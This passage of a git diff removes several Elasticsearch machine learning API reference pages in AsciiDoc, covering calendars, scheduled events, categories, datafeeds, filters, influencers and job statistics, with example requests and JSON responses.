"bucket_span" : 3600, - "initial_anomaly_score" : 91.58505459594764, - "event_count" : 0, - "is_interim" : false, - "bucket_influencers" : [ - { - "job_id" : "low_request_rate", - "result_type" : "bucket_influencer", - "influencer_field_name" : "bucket_time", - "initial_anomaly_score" : 91.58505459594764, - "anomaly_score" : 91.58505459594764, - "raw_anomaly_score" : 0.5758246639716365, - "probability" : 1.7340849573442696E-4, - "timestamp" : 1578398400000, - "bucket_span" : 3600, - "is_interim" : false - } - ], - "processing_time_ms" : 0, - "result_type" : "bucket" - } - ] -} ----- \ No newline at end of file diff --git a/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc deleted file mode 100644 index 3f3516f9e2c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-calendar-event]] -= Get scheduled events API -++++ -Get scheduled events -++++ - -Retrieves information about the scheduled events in calendars. - -[[ml-get-calendar-event-request]] -== {api-request-title} - -`GET _ml/calendars//events` + - -`GET _ml/calendars/_all/events` - -[[ml-get-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-calendar-event-desc]] -== {api-description-title} - -You can get scheduled event information for multiple calendars in a single -API request by using a comma-separated list of ids or a wildcard expression. -You can get scheduled event information for all calendars by using `_all`, -by specifying `*` as the ``, or by omitting the ``. - -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[[ml-get-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-get-calendar-event-request-body]] -== {api-request-body-title} - -`end`:: -(Optional, string) Specifies to get events with timestamps earlier than this -time. - -`from`:: -(Optional, integer) Skips the specified number of events. - -`size`:: -(Optional, integer) Specifies the maximum number of events to obtain. - -`start`:: -(Optional, string) Specifies to get events with timestamps after this time. - -[[ml-get-calendar-event-results]] -== {api-response-body-title} - -The API returns an array of scheduled event resources, which have the -following properties: - -`calendar_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -`description`:: -(string) A description of the scheduled event. - -`end_time`:: -(date) The timestamp for the end of the scheduled event in milliseconds since -the epoch or ISO 8601 format. - -`event_id`:: -(string) An automatically-generated identifier for the scheduled event. - -`start_time`:: -(date) The timestamp for the beginning of the scheduled event in milliseconds -since the epoch or ISO 8601 format. - -[[ml-get-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/calendars/planned-outages/events --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addevent] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 3, - "events": [ - { - "description": "event 1", - "start_time": 1513641600000, - "end_time": 1513728000000, - "calendar_id": "planned-outages", - "event_id": "LS8LJGEBMTCMA-qz49st" - }, - { - "description": "event 2", - "start_time": 1513814400000, - "end_time": 1513900800000, - "calendar_id": "planned-outages", - "event_id": "Li8LJGEBMTCMA-qz49st" - }, - { - "description": "event 3", - "start_time": 1514160000000, - "end_time": 1514246400000, - "calendar_id": "planned-outages", - "event_id": "Ly8LJGEBMTCMA-qz49st" - } - ] -} ----- -// TESTRESPONSE[s/LS8LJGEBMTCMA-qz49st/$body.$_path/] -// TESTRESPONSE[s/Li8LJGEBMTCMA-qz49st/$body.$_path/] -// TESTRESPONSE[s/Ly8LJGEBMTCMA-qz49st/$body.$_path/] diff --git a/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc deleted file mode 100644 index 7b4e5bbe12b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-calendar]] -= Get calendars API -++++ -Get calendars -++++ - -Retrieves configuration information for calendars. - -[[ml-get-calendar-request]] -== {api-request-title} - -`GET _ml/calendars/` + - -`GET _ml/calendars/_all` - -[[ml-get-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-calendar-desc]] -== {api-description-title} - -You can get information for multiple calendars in a single API request by using a -comma-separated list of ids or a wildcard expression. You can get -information for all calendars by using `_all`, by specifying `*` as the -``, or by omitting the ``. - -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[[ml-get-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-get-calendar-request-body]] -== {api-request-body-title} - -`page`.`from`:: -(Optional, integer) Skips the specified number of calendars. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of calendars to obtain. - -[[ml-get-calendar-results]] -== {api-response-body-title} - -The API returns an array of calendar resources, which have the following -properties: - -`calendar_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -`job_ids`:: -(array) An array of {anomaly-job} identifiers. For example: `["total-requests"]`. - -[[ml-get-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "calendars": [ - { - "calendar_id": "planned-outages", - "job_ids": [ - "total-requests" - ] - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc deleted file mode 100644 index e98bd282b9a..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc +++ /dev/null @@ -1,164 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-category]] -= Get categories API -++++ -Get categories -++++ - -Retrieves {anomaly-job} results for one or more categories. - -[[ml-get-category-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/categories` + - -`GET _ml/anomaly_detectors//results/categories/` - -[[ml-get-category-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-category-desc]] -== {api-description-title} - -When `categorization_field_name` is specified in the job configuration, it is -possible to view the definitions of the resulting categories. A category -definition describes the common terms matched and contains examples of matched -values. - -The anomaly results from a categorization analysis are available as bucket, -influencer, and record results. For example, the results might indicate that -at 16:45 there was an unusual count of log message category 11. You can then -examine the description and examples of that category. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. - -[[ml-get-category-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, long) Identifier for the category, which is unique in the job. If you -specify neither the category ID nor the `partition_field_value`, the API returns -information about all categories. If you specify only the -`partition_field_value`, it returns information about all categories for the -specified partition. - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-category-request-body]] -== {api-request-body-title} - -`page`.`from`:: -(Optional, integer) Skips the specified number of categories. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of categories to obtain. - -`partition_field_value`:: -(Optional, string) Only return categories for the specified partition. - -[[ml-get-category-results]] -== {api-response-body-title} - -The API returns an array of category objects, which have the following -properties: - -`category_id`:: -(unsigned integer) A unique identifier for the category. `category_id` is unique -at the job level, even when per-partition categorization is enabled. - - -`examples`:: -(array) A list of examples of actual values that matched the category. - -`grok_pattern`:: -experimental[] (string) A Grok pattern that could be used in {ls} or an ingest -pipeline to extract fields from messages that match the category. This field is -experimental and may be changed or removed in a future release. The Grok -patterns that are found are not optimal, but are often a good starting point for -manual tweaking. - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`max_matching_length`:: -(unsigned integer) The maximum length of the fields that matched the category. -The value is increased by 10% to enable matching for similar fields that have -not been analyzed. - -// This doesn't use the shared description because there are -// categorization-specific aspects to its use in this context -`partition_field_name`:: -(string) If per-partition categorization is enabled, this property identifies -the field used to segment the categorization. It is not present when -per-partition categorization is disabled. - -`partition_field_value`:: -(string) If per-partition categorization is enabled, this property identifies -the value of the `partition_field_name` for the category. It is not present when -per-partition categorization is disabled. - -`regex`:: -(string) A regular expression that is used to search for values that match the -category. - -`terms`:: -(string) A space separated list of the common tokens that are matched in values -of the category. - -`num_matches`:: -(long) The number of messages that have been matched by this category. This is -only guaranteed to have the latest accurate count after a job `_flush` or `_close` - -`preferred_to_categories`:: -(list) A list of `category_id` entries that this current category encompasses. -Any new message that is processed by the categorizer will match against this -category and not any of the categories in this list. This is only guaranteed -to have the latest accurate list of categories after a job `_flush` or `_close` - -[[ml-get-category-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/esxi_log/results/categories -{ - "page":{ - "size": 1 - } -} --------------------------------------------------- -// TEST[skip:todo] - -In this example, the API returns the following information: -[source,js] ----- -{ - "count": 11, - "categories": [ - { - "job_id" : "esxi_log", - "category_id" : 1, - "terms" : "Vpxa verbose vpxavpxaInvtVm opID VpxaInvtVmChangeListener Guest DiskInfo Changed", - "regex" : ".*?Vpxa.+?verbose.+?vpxavpxaInvtVm.+?opID.+?VpxaInvtVmChangeListener.+?Guest.+?DiskInfo.+?Changed.*", - "max_matching_length": 154, - "examples" : [ - "Oct 19 17:04:44 esxi1.acme.com Vpxa: [3CB3FB90 verbose 'vpxavpxaInvtVm' opID=WFU-33d82c31] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:45 esxi2.acme.com Vpxa: [3CA66B90 verbose 'vpxavpxaInvtVm' opID=WFU-33927856] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:51 esxi1.acme.com Vpxa: [FFDBAB90 verbose 'vpxavpxaInvtVm' opID=WFU-25e0d447] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:58 esxi2.acme.com Vpxa: [FFDDBB90 verbose 'vpxavpxaInvtVm' opID=WFU-bbff0134] [VpxaInvtVmChangeListener] Guest DiskInfo Changed" - ], - "grok_pattern" : ".*?%{SYSLOGTIMESTAMP:timestamp}.+?Vpxa.+?%{BASE16NUM:field}.+?verbose.+?vpxavpxaInvtVm.+?opID.+?VpxaInvtVmChangeListener.+?Guest.+?DiskInfo.+?Changed.*" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc deleted file mode 100644 index d002973b8f6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-datafeed-stats]] -= Get {dfeed} statistics API - -[subs="attributes"] -++++ -Get {dfeed} statistics -++++ - -Retrieves usage information for {dfeeds}. - -[[ml-get-datafeed-stats-request]] -== {api-request-title} - -`GET _ml/datafeeds//_stats` + - -`GET _ml/datafeeds/,/_stats` + - -`GET _ml/datafeeds/_stats` + - -`GET _ml/datafeeds/_all/_stats` - -[[ml-get-datafeed-stats-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-datafeed-stats-desc]] -== {api-description-title} - -You can get statistics for multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can get -statistics for all {dfeeds} by using `_all`, by specifying `*` as the -``, or by omitting the ``. - -If the {dfeed} is stopped, the only information you receive is the -`datafeed_id` and the `state`. - -IMPORTANT: This API returns a maximum of 10,000 {dfeeds}. - -[[ml-get-datafeed-stats-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] -+ --- -If you do not specify one of these options, the API returns information about -all {dfeeds}. --- - -[[ml-get-datafeed-stats-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[role="child_attributes"] -[[ml-get-datafeed-stats-results]] -== {api-response-body-title} - -The API returns an array of {dfeed} count objects. All of these properties are -informational; you cannot update their values. - -`assignment_explanation`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-datafeeds] - -`datafeed_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -`node`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] -+ --- -[%collapsible%open] -==== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. For example, `0-o0tOo`. - -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -==== --- - -`state`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-datafeed] - -`timing_stats`:: -(object) An object that provides statistical information about timing aspect of -this {dfeed}. -+ --- -[%collapsible%open] -==== -`average_search_time_per_bucket_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-bucket-avg] - -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`exponential_average_search_time_per_hour_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-exp-avg-hour] - -`job_id`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`search_count`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-count] - -`total_search_time_ms`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-time] -==== --- - - -[[ml-get-datafeed-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-datafeed-stats-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data started datafeed] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "datafeeds": [ - { - "datafeed_id": "datafeed-high_sum_total_sales", - "state": "started", - "node": { - "id": "2spCyo1pRi2Ajo-j-_dnPX", - "name": "node-0", - "ephemeral_id": "hoXMLZB0RWKfR9UPPUCxXX", - "transport_address": "127.0.0.1:9300", - "attributes": { - "ml.machine_memory": "17179869184", - "ml.max_open_jobs": "20" - } - }, - "assignment_explanation": "", - "timing_stats": { - "job_id" : "high_sum_total_sales", - "search_count" : 27, - "bucket_count" : 619, - "total_search_time_ms" : 296.0, - "average_search_time_per_bucket_ms" : 0.4781906300484653, - "exponential_average_search_time_per_hour_ms" : 33.28246548059884 - } - } - ] -} ----- -// TESTRESPONSE[s/"2spCyo1pRi2Ajo-j-_dnPX"/$body.$_path/] -// TESTRESPONSE[s/"node-0"/$body.$_path/] -// TESTRESPONSE[s/"hoXMLZB0RWKfR9UPPUCxXX"/$body.$_path/] -// TESTRESPONSE[s/"127.0.0.1:9300"/$body.$_path/] -// TESTRESPONSE[s/"17179869184"/$body.datafeeds.0.node.attributes.ml\\.machine_memory/] diff --git a/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc deleted file mode 100644 index e622609df48..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-datafeed]] -= Get {dfeeds} API - -[subs="attributes"] -++++ -Get {dfeeds} -++++ - -Retrieves configuration information for {dfeeds}. - -[[ml-get-datafeed-request]] -== {api-request-title} - -`GET _ml/datafeeds/` + - -`GET _ml/datafeeds/,` + - -`GET _ml/datafeeds/` + - -`GET _ml/datafeeds/_all` - -[[ml-get-datafeed-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-datafeed-desc]] -== {api-description-title} - -You can get information for multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can get -information for all {dfeeds} by using `_all`, by specifying `*` as the -``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 {dfeeds}. - -[[ml-get-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] -+ --- -If you do not specify one of these options, the API returns information about -all {dfeeds}. --- - -[[ml-get-datafeed-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[[ml-get-datafeed-results]] -== {api-response-body-title} - -The API returns an array of {dfeed} resources. For the full list of properties, -see <>. - -[[ml-get-datafeed-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "datafeeds": [ - { - "datafeed_id": "datafeed-high_sum_total_sales", - "job_id": "high_sum_total_sales", - "query_delay": "93169ms", - "indices": [ - "kibana_sample_data_ecommerce" - ], - "query" : { - "bool" : { - "filter" : [ - { - "term" : { - "_index" : "kibana_sample_data_ecommerce" - } - } - ] - } - }, - "scroll_size": 1000, - "chunking_config": { - "mode": "auto" - }, - "delayed_data_check_config" : { - "enabled" : true - } - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc deleted file mode 100644 index a0c4a1697da..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-filter]] -= Get filters API -++++ -Get filters -++++ - -Retrieves filters. - -[[ml-get-filter-request]] -== {api-request-title} - -`GET _ml/filters/` + - -`GET _ml/filters/` - -[[ml-get-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-filter-desc]] -== {api-description-title} - -You can get a single filter or all filters. For more information, see -{ml-docs}/ml-rules.html[Machine learning custom rules]. - -[[ml-get-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-get-filter-query-parms]] -== {api-query-parms-title} - -`from`:: -(Optional, integer) Skips the specified number of filters. - -`size`:: -(Optional, integer) Specifies the maximum number of filters to obtain. - -[[ml-get-filter-results]] -== {api-response-body-title} - -The API returns an array of filter resources, which have the following -properties: - -`description`:: -(string) A description of the filter. - -`filter_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -`items`:: -(array of strings) An array of strings which is the filter item list. - -[[ml-get-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/filters/safe_domains --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "filters": [ - { - "filter_id": "safe_domains", - "description": "A list of safe domains", - "items": [ - "*.google.com", - "wikipedia.org" - ] - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc deleted file mode 100644 index 94418a2b6ce..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc +++ /dev/null @@ -1,161 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-influencer]] -= Get influencers API -++++ -Get influencers -++++ - -Retrieves {anomaly-job} results for one or more influencers. - -[[ml-get-influencer-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/influencers` - -[[ml-get-influencer-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-influencer-desc]] -== {api-description-title} - -Influencers are the entities that have contributed to, or are to blame for, -the anomalies. Influencer results are available only if an -`influencer_field_name` is specified in the job configuration. - -[[ml-get-influencer-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-influencer-request-body]] -== {api-request-body-title} - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns influencers with timestamps earlier than this time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`influencer_score`:: -(Optional, double) Returns influencers with anomaly scores greater than or equal -to this value. - -`page`.`from`:: -(Optional, integer) Skips the specified number of influencers. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of influencers to obtain. - -`sort`:: -(Optional, string) Specifies the sort field for the requested influencers. By -default, the influencers are sorted by the `influencer_score` value. - -`start`:: -(Optional, string) Returns influencers with timestamps after this time. - -[[ml-get-influencer-results]] -== {api-response-body-title} - -The API returns an array of influencer objects, which have the following -properties: - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`influencer_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the influencer in this bucket aggregated across detectors. Unlike -`initial_influencer_score`, this value will be updated by a re-normalization -process as new data is analyzed. - -`influencer_field_name`:: -(string) The field name of the influencer. - -`influencer_field_value`:: -(string) The entity that influenced, contributed to, or was to blame for the -anomaly. - -`initial_influencer_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the influencer aggregated across detectors. This is the initial value that was -calculated at the time the bucket was processed. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`probability`:: -(number) The probability that the influencer has this behavior, in the range 0 -to 1. This value can be held to a high precision of over 300 decimal places, so -the `influencer_score` is provided as a human-readable and friendly -interpretation of this. - -`result_type`:: -(string) Internal. This value is always set to `influencer`. - -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -NOTE: Additional influencer properties are added, depending on the fields being -analyzed. For example, if it's analyzing `user_name` as an influencer, then a -field `user_name` is added to the result document. This information enables you to -filter the anomaly results more easily. - -[[ml-get-influencer-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales/results/influencers -{ - "sort": "influencer_score", - "desc": true -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns the following information, sorted based on the -influencer score in descending order: -[source,js] ----- -{ - "count": 189, - "influencers": [ - { - "job_id": "high_sum_total_sales", - "result_type": "influencer", - "influencer_field_name": "customer_full_name.keyword", - "influencer_field_value": "Wagdi Shaw", - "customer_full_name.keyword" : "Wagdi Shaw", - "influencer_score": 99.02493, - "initial_influencer_score" : 94.67233079580171, - "probability" : 1.4784807245686567E-10, - "bucket_span" : 3600, - "is_interim" : false, - "timestamp" : 1574661600000 - }, - ... - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc deleted file mode 100644 index 7b8de2662d4..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc +++ /dev/null @@ -1,477 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-job-stats]] -= Get {anomaly-job} statistics API -++++ -Get job statistics -++++ - -Retrieves usage information for {anomaly-jobs}. - -[[ml-get-job-stats-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//_stats` - -`GET _ml/anomaly_detectors/,/_stats` + - -`GET _ml/anomaly_detectors/_stats` + - -`GET _ml/anomaly_detectors/_all/_stats` - -[[ml-get-job-stats-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-job-stats-desc]] -== {api-description-title} - -You can get statistics for multiple {anomaly-jobs} in a single API request by -using a group name, a comma-separated list of jobs, or a wildcard expression. -You can get statistics for all {anomaly-jobs} by using `_all`, by specifying `*` -as the ``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 jobs. - -[[ml-get-job-stats-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-default] - -[[ml-get-job-stats-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -[role="child_attributes"] -[[ml-get-job-stats-results]] -== {api-response-body-title} - -The API returns the following information about the operational progress of a -job: - -`assignment_explanation`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-anomaly-jobs] - -//Begin data_counts -[[datacounts]]`data_counts`:: -(object) An object that describes the quantity of input to the job and any -related error counts. The `data_count` values are cumulative for the lifetime of -a job. If a model snapshot is reverted or old results are deleted, the job -counts are not reset. -+ -.Properties of `data_counts` -[%collapsible%open] -==== -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count-anomaly-jobs] - -`earliest_record_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=earliest-record-timestamp] - -`empty_bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=empty-bucket-count] - -`input_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-bytes] - -`input_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-field-count] - -`input_record_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-record-count] - -`invalid_date_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=invalid-date-count] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`last_data_time`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=last-data-time] - -`latest_empty_bucket_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-empty-bucket-timestamp] - -`latest_record_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-record-timestamp] - -`latest_sparse_bucket_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-sparse-record-timestamp] - -`missing_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=missing-field-count] -+ -The value of `processed_record_count` includes this count. - -`out_of_order_timestamp_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=out-of-order-timestamp-count] - -`processed_field_count`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-field-count] - -`processed_record_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-record-count] - -`sparse_bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=sparse-bucket-count] -==== -//End data_counts - -`deleting`:: -(Boolean) -Indicates that the process of deleting the job is in progress but not yet -completed. It is only reported when `true`. - -//Begin forecasts_stats -[[forecastsstats]]`forecasts_stats`:: -(object) An object that provides statistical information about forecasts -belonging to this job. Some statistics are omitted if no forecasts have been -made. -+ -NOTE: Unless there is at least one forecast, `memory_bytes`, `records`, -`processing_time_ms` and `status` properties are omitted. -+ -.Properties of `forecasts_stats` -[%collapsible%open] -==== -`forecasted_jobs`::: -(long) A value of `0` indicates that forecasts do not exist for this job. A -value of `1` indicates that at least one forecast exists. - -`memory_bytes`::: -(object) The `avg`, `min`, `max` and `total` memory usage in bytes for forecasts -related to this job. If there are no forecasts, this property is omitted. - -`processing_time_ms`::: -(object) The `avg`, `min`, `max` and `total` runtime in milliseconds for -forecasts related to this job. If there are no forecasts, this property is -omitted. - 